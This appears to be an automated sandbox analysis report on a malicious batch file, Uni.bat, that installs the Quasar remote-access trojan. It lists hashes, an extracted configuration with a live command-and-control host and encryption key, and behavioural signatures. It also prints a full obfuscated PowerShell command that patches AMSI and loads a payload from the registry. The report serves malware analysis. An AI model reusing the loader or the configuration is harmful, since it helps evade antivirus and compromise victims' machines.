Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows11-21h2_x64 -
resource
win11-20240426-en -
resource tags
arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system -
submitted
14-05-2024 23:05
Static task
static1
Behavioral task
behavioral1
Sample
Uni.bat
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
Uni.bat
Resource
win7-20240215-en
Behavioral task
behavioral3
Sample
Uni.bat
Resource
win10v2004-20240426-en
General
-
Target
Uni.bat
-
Size
515KB
-
MD5
4c2a3be3d5c9464eb441677e41f44fd8
-
SHA1
c826034a0882d21a39056d745e88622ee9698343
-
SHA256
45e68be3e89afc1bec174219bccc5a9388efda16b46c69304dfcd87c0d9657f7
-
SHA512
ccf12f0e439393f4fef5531ef89a62411feeaed9d7f0751e9e4c5fb366d1cd0059a11e0a12002b851ff138701f69d65ce7ad69f1bcb6e3944481311311c8f27c
-
SSDEEP
12288:OOCZeIh9XQFAbCbtqTUGLYPSow/QWEO2b:4zh9+3tZGEw/b2b
Malware Config
Extracted
quasar
3.1.5
SLAVE
review-tops.gl.at.ply.gg:48212
$Sxr-IGnkORFTlshRl7BdTw
-
encryption_key
YDmRBA8wExjQkYgGrHhN
-
install_name
$sxr-powershell.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Discord
-
subdirectory
$77
Signatures
-
Quasar payload 1 IoCs
Processes:
resource yara_rule behavioral4/memory/480-73-0x0000000007380000-0x00000000073EC000-memory.dmp family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 2644 created 644 2644 powershell.EXE winlogon.exe -
Blocklisted process makes network request 3 IoCs
Processes:
powershell.exeflow pid process 2 480 powershell.exe 4 480 powershell.exe 5 480 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepid process 480 powershell.exe 3552 powershell.exe 3276 powershell.exe -
Executes dropped EXE 2 IoCs
Processes:
$sxr-powershell.exeinstall.exepid process 5060 $sxr-powershell.exe 244 install.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 1 ip-api.com -
Drops file in System32 directory 5 IoCs
Processes:
powershell.EXEsvchost.exeOfficeClickToRun.exedescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 2644 set thread context of 1156 2644 powershell.EXE dllhost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 55 IoCs
Processes:
powershell.EXEsvchost.exeOfficeClickToRun.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1715728046" OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={DA4A53E1-FE86-4F0F-B330-24C883B334B2}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Tue, 14 May 2024 23:07:27 GMT" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE -
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000_Classes\Local Settings powershell.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exe$sxr-powershell.exepowershell.EXEdllhost.exepid process 3552 powershell.exe 3552 powershell.exe 3276 powershell.exe 3276 powershell.exe 480 powershell.exe 480 powershell.exe 5060 $sxr-powershell.exe 5060 $sxr-powershell.exe 2644 powershell.EXE 2644 powershell.EXE 2644 powershell.EXE 1156 dllhost.exe 1156 dllhost.exe 1156 dllhost.exe 1156 dllhost.exe 1156 dllhost.exe 1156 dllhost.exe 1156 dllhost.exe 1156 dllhost.exe 1156 dllhost.exe 1156 dllhost.exe 1156 dllhost.exe 1156 dllhost.exe 1156 dllhost.exe 1156 dllhost.exe 1156 dllhost.exe 1156 dllhost.exe 1156 dllhost.exe 1156 dllhost.exe 1156 dllhost.exe 1156 dllhost.exe 1156 dllhost.exe 1156 dllhost.exe 1156 dllhost.exe 1156 dllhost.exe 1156 dllhost.exe 1156 dllhost.exe 1156 dllhost.exe 1156 dllhost.exe 1156 dllhost.exe 1156 dllhost.exe 1156 dllhost.exe 1156 dllhost.exe 1156 dllhost.exe 1156 dllhost.exe 1156 dllhost.exe 1156 dllhost.exe 1156 dllhost.exe 1156 dllhost.exe 1156 dllhost.exe 1156 dllhost.exe 1156 dllhost.exe 1156 dllhost.exe 1156 dllhost.exe 1156 dllhost.exe 1156 dllhost.exe 1156 dllhost.exe 1156 dllhost.exe 1156 dllhost.exe 1156 dllhost.exe 1156 dllhost.exe 1156 dllhost.exe 1156 dllhost.exe 1156 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3552 powershell.exe Token: SeDebugPrivilege 3276 powershell.exe Token: SeIncreaseQuotaPrivilege 3276 powershell.exe Token: SeSecurityPrivilege 3276 powershell.exe Token: SeTakeOwnershipPrivilege 3276 powershell.exe Token: SeLoadDriverPrivilege 3276 powershell.exe Token: SeSystemProfilePrivilege 3276 powershell.exe Token: SeSystemtimePrivilege 3276 powershell.exe Token: SeProfSingleProcessPrivilege 3276 powershell.exe Token: SeIncBasePriorityPrivilege 3276 powershell.exe Token: SeCreatePagefilePrivilege 3276 powershell.exe Token: SeBackupPrivilege 3276 powershell.exe Token: SeRestorePrivilege 3276 powershell.exe Token: SeShutdownPrivilege 3276 powershell.exe Token: SeDebugPrivilege 3276 powershell.exe Token: SeSystemEnvironmentPrivilege 3276 powershell.exe Token: SeRemoteShutdownPrivilege 3276 powershell.exe Token: SeUndockPrivilege 3276 powershell.exe Token: SeManageVolumePrivilege 3276 powershell.exe Token: 33 3276 powershell.exe Token: 34 3276 powershell.exe Token: 35 3276 powershell.exe Token: 36 3276 powershell.exe Token: SeIncreaseQuotaPrivilege 3276 powershell.exe Token: SeSecurityPrivilege 3276 powershell.exe Token: SeTakeOwnershipPrivilege 3276 powershell.exe Token: SeLoadDriverPrivilege 3276 powershell.exe Token: SeSystemProfilePrivilege 3276 powershell.exe Token: SeSystemtimePrivilege 3276 powershell.exe Token: SeProfSingleProcessPrivilege 3276 powershell.exe Token: SeIncBasePriorityPrivilege 3276 powershell.exe Token: SeCreatePagefilePrivilege 3276 powershell.exe Token: SeBackupPrivilege 3276 powershell.exe Token: SeRestorePrivilege 3276 powershell.exe Token: SeShutdownPrivilege 3276 powershell.exe Token: SeDebugPrivilege 3276 powershell.exe Token: SeSystemEnvironmentPrivilege 3276 powershell.exe Token: SeRemoteShutdownPrivilege 3276 powershell.exe Token: SeUndockPrivilege 3276 powershell.exe Token: SeManageVolumePrivilege 3276 powershell.exe Token: 33 3276 powershell.exe Token: 34 3276 powershell.exe Token: 35 3276 powershell.exe Token: 36 3276 powershell.exe Token: SeIncreaseQuotaPrivilege 3276 powershell.exe Token: SeSecurityPrivilege 3276 powershell.exe Token: SeTakeOwnershipPrivilege 3276 powershell.exe Token: SeLoadDriverPrivilege 3276 powershell.exe Token: SeSystemProfilePrivilege 3276 powershell.exe Token: SeSystemtimePrivilege 3276 powershell.exe Token: SeProfSingleProcessPrivilege 3276 powershell.exe Token: SeIncBasePriorityPrivilege 3276 powershell.exe Token: SeCreatePagefilePrivilege 3276 powershell.exe Token: SeBackupPrivilege 3276 powershell.exe Token: SeRestorePrivilege 3276 powershell.exe Token: SeShutdownPrivilege 3276 powershell.exe Token: SeDebugPrivilege 3276 powershell.exe Token: SeSystemEnvironmentPrivilege 3276 powershell.exe Token: SeRemoteShutdownPrivilege 3276 powershell.exe Token: SeUndockPrivilege 3276 powershell.exe Token: SeManageVolumePrivilege 3276 powershell.exe Token: 33 3276 powershell.exe Token: 34 3276 powershell.exe Token: 35 3276 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exenet.exepowershell.exeWScript.execmd.exenet.exepowershell.exepowershell.EXEdllhost.exedescription pid process target process PID 3056 wrote to memory of 2740 3056 cmd.exe net.exe PID 3056 wrote to memory of 2740 3056 cmd.exe net.exe PID 2740 wrote to memory of 3492 2740 net.exe net1.exe PID 2740 wrote to memory of 3492 2740 net.exe net1.exe PID 3056 wrote to memory of 3552 3056 cmd.exe powershell.exe PID 3056 wrote to memory of 3552 3056 cmd.exe powershell.exe PID 3056 wrote to memory of 3552 3056 cmd.exe powershell.exe PID 3552 wrote to memory of 3276 3552 powershell.exe powershell.exe PID 3552 wrote to memory of 3276 3552 powershell.exe powershell.exe PID 3552 wrote to memory of 3276 3552 powershell.exe powershell.exe PID 3552 wrote to memory of 8 3552 powershell.exe WScript.exe PID 3552 wrote to memory of 8 3552 powershell.exe WScript.exe PID 3552 wrote to memory of 8 3552 powershell.exe WScript.exe PID 8 wrote to memory of 2876 8 WScript.exe cmd.exe PID 8 wrote to memory of 2876 8 WScript.exe cmd.exe PID 8 wrote to memory of 2876 8 WScript.exe cmd.exe PID 2876 wrote to memory of 4792 2876 cmd.exe net.exe PID 2876 wrote to memory of 4792 2876 cmd.exe net.exe PID 2876 wrote to memory of 4792 2876 cmd.exe net.exe PID 4792 wrote to memory of 2008 4792 net.exe net1.exe PID 4792 wrote to memory of 2008 4792 net.exe net1.exe PID 4792 wrote to memory of 2008 4792 net.exe net1.exe PID 2876 wrote to memory of 480 2876 cmd.exe powershell.exe PID 2876 wrote to memory of 480 2876 cmd.exe powershell.exe PID 2876 wrote to memory of 480 2876 cmd.exe powershell.exe PID 480 wrote to memory of 4744 480 powershell.exe schtasks.exe PID 480 wrote to memory of 4744 480 powershell.exe schtasks.exe PID 480 wrote to memory of 4744 480 powershell.exe schtasks.exe PID 480 wrote to memory of 5060 480 powershell.exe $sxr-powershell.exe PID 480 wrote to memory of 5060 480 powershell.exe $sxr-powershell.exe PID 480 wrote to memory of 5060 480 powershell.exe $sxr-powershell.exe PID 480 wrote to memory of 244 480 powershell.exe install.exe PID 480 wrote to memory of 244 480 powershell.exe install.exe PID 480 wrote to memory of 244 480 powershell.exe install.exe PID 2644 wrote to memory of 1156 2644 powershell.EXE dllhost.exe PID 2644 wrote to memory of 1156 2644 powershell.EXE dllhost.exe PID 2644 wrote to memory of 1156 2644 powershell.EXE dllhost.exe PID 2644 wrote to memory of 1156 2644 powershell.EXE dllhost.exe PID 2644 wrote to memory of 1156 2644 powershell.EXE dllhost.exe PID 2644 wrote to memory of 1156 2644 powershell.EXE dllhost.exe PID 2644 wrote to memory of 1156 2644 powershell.EXE dllhost.exe PID 2644 wrote to memory of 1156 2644 powershell.EXE dllhost.exe PID 1156 wrote to memory of 644 1156 dllhost.exe winlogon.exe PID 1156 wrote to memory of 700 1156 dllhost.exe lsass.exe PID 1156 wrote to memory of 996 1156 dllhost.exe svchost.exe PID 1156 wrote to memory of 436 1156 dllhost.exe dwm.exe PID 1156 wrote to memory of 460 1156 dllhost.exe svchost.exe PID 1156 wrote to memory of 416 1156 dllhost.exe svchost.exe PID 1156 wrote to memory of 1040 1156 dllhost.exe svchost.exe PID 1156 wrote to memory of 1060 1156 dllhost.exe svchost.exe PID 1156 wrote to memory of 1100 1156 dllhost.exe svchost.exe PID 1156 wrote to memory of 1216 1156 dllhost.exe svchost.exe PID 1156 wrote to memory of 1252 1156 dllhost.exe svchost.exe PID 1156 wrote to memory of 1308 1156 dllhost.exe svchost.exe PID 1156 wrote to memory of 1360 1156 dllhost.exe svchost.exe PID 1156 wrote to memory of 1396 1156 dllhost.exe svchost.exe PID 1156 wrote to memory of 1428 1156 dllhost.exe svchost.exe PID 1156 wrote to memory of 1472 1156 dllhost.exe svchost.exe PID 1156 wrote to memory of 1496 1156 dllhost.exe svchost.exe PID 1156 wrote to memory of 1664 1156 dllhost.exe svchost.exe PID 1156 wrote to memory of 1708 1156 dllhost.exe svchost.exe PID 1156 wrote to memory of 1748 1156 dllhost.exe svchost.exe PID 1156 wrote to memory of 1756 1156 dllhost.exe svchost.exe PID 1156 wrote to memory of 1844 1156 dllhost.exe svchost.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:644
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:436
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{3d293ea8-3858-44ad-bcc9-9f98bbd867ae}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1156
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:700
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:996
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:460
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:416
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1040
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1060
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1100
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:gvDVrbVNbelO{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ZRhNPvmbYtFmMR,[Parameter(Position=1)][Type]$xuiWXuSEHt)$LAAYmLRettP=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+'e'+[Char](102)+''+[Char](108)+''+'e'+''+'c'+'tedD'+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+'M'+[Char](101)+''+'m'+''+'o'+''+[Char](114)+''+'y'+''+[Char](77)+'o'+[Char](100)+''+[Char](117)+'l'+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+'D'+''+[Char](101)+''+[Char](108)+'e'+'g'+''+[Char](97)+''+[Char](116)+'e'+'T'+''+[Char](121)+''+[Char](112)+''+'e'+'',''+'C'+'l'+[Char](97)+''+'s'+'s'+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+','+''+'S'+''+[Char](101)+'a'+[Char](108)+''+[Char](101)+''+[Char](100)+''+[Char](44)+'A'+[Char](110)+''+[Char](115)+'i'+[Char](67)+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$LAAYmLRettP.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+'p'+'e'+'c'+'i'+''+'a'+'l'+'N'+''+[Char](97)+''+[Char](109)+''+[Char](101)+','+'H'+''+'i'+''+'d'+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+''+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$ZRhNPvmbYtFmMR).SetImplementationFlags('R'+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+'na'+[Char](103)+''+[Char](101)+''+[Char](100)+'');$LAAYmLRettP.DefineMethod(''+'I'+''+'n'+''+[Char](118)+''+[Char](111)+''+'k'+''+'e'+'','P'+'u'+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'deBy'+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+'ew'+[Char](83)+'l'+'o'+''+'t'+',V'+'i'+''+[Char](114)+'t'+'u'+''+[Char](97)+''+[Char](108)+'',$xuiWXuSEHt,$ZRhNPvmbYtFmMR).SetImplementationFlags(''+'R'+''+[Char](117)+'nt'+'i'+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+'a'+[Char](110)+''+'a'+''+[Char](103)+'e'+[Char](100)+'');Write-Output $LAAYmLRettP.CreateType();}$ePtTIHkyhOuYn=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+'dl'+'l'+'')}).GetType('Mic'+[Char](114)+''+[Char](111)+''+'s'+''+[Char](111)+''+[Char](102)+''+'t'+''+[Char](46)+'Win'+'3'+'2'+[Char](46)+'Uns'+'a'+''+[Char](102)+'e'+'N'+''+'a'+''+[Char](116)+''+[Char](105)+''+[Char](118)+'eM'+[Char](101)+'t'+[Char](104)+''+'o'+''+[Char](100)+''+[Char](115)+'');$pbbugAOWrjszIp=$ePtTIHkyhOuYn.GetMethod(''+[Char](71)+''+[Char](101)+'t'+[Char](80)+'r'+[Char](111)+''+[Char](99)+''+[Char](65)+'d'+[Char](100)+''+[Char](114)+''+'e'+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags]('P'+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+'S'+[Char](116)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$gvaflfonItCtTVaAdLp=gvDVrbVNbelO @([String])([IntPtr]);$stLbebnzurNRbTNHGzQwQM=gvDVrbVNbelO @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ZWUjVVOCYrA=$ePtTIHkyhOuYn.GetMethod(''+'G'+'et'+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+'eH'+[Char](97)+'n'+[Char](100)+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+''+[Char](110)+'e'+'l'+'3'+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$ZIiBEnEwJgBaMP=$pbbugAOWrjszIp.Invoke($Null,@([Object]$ZWUjVVOCYrA,[Object](''+[Char](76)+''+'o'+''+[Char](97)+''+[Char](100)+''+'L'+'i'+[Char](98)+''+[Char](114)+''+[Char](97)+'r'+'y'+'A')));$xxypUFDLXWklvNWZS=$pbbugAOWrjszIp.Invoke($Null,@([Object]$ZWUjVVOCYrA,[Object](''+[Char](86)+''+[Char](105)+'r'+[Char](116)+''+'u'+'a'+[Char](108)+''+[Char](80)+''+[Char](114)+''+'o'+'te'+'c'+''+'t'+'')));$tWIAwJz=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ZIiBEnEwJgBaMP,$gvaflfonItCtTVaAdLp).Invoke(''+[Char](97)+'m'+'s'+''+[Char](105)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'');$jDHOaNrHqDHLOdmNd=$pbbugAOWrjszIp.Invoke($Null,@([Object]$tWIAwJz,[Object](''+[Char](65)+''+[Char](109)+''+'s'+'i'+[Char](83)+''+[Char](99)+''+[Char](97)+''+[Char](110)+'B'+'u'+'f'+[Char](102)+'er')));$HQzkNVLxWZ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($xxypUFDLXWklvNWZS,$stLbebnzurNRbTNHGzQwQM).Invoke($jDHOaNrHqDHLOdmNd,[uint32]8,4,[ref]$HQzkNVLxWZ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$jDHOaNrHqDHLOdmNd,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($xxypUFDLXWklvNWZS,$stLbebnzurNRbTNHGzQwQM).Invoke($jDHOaNrHqDHLOdmNd,[uint32]8,0x20,[ref]$HQzkNVLxWZ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+''+[Char](84)+'W'+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+''+'s'+''+[Char](116)+''+[Char](97)+'g'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2644
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1216
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1252
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵PID:1308
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1360
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
PID:1396
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1428
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2872
-
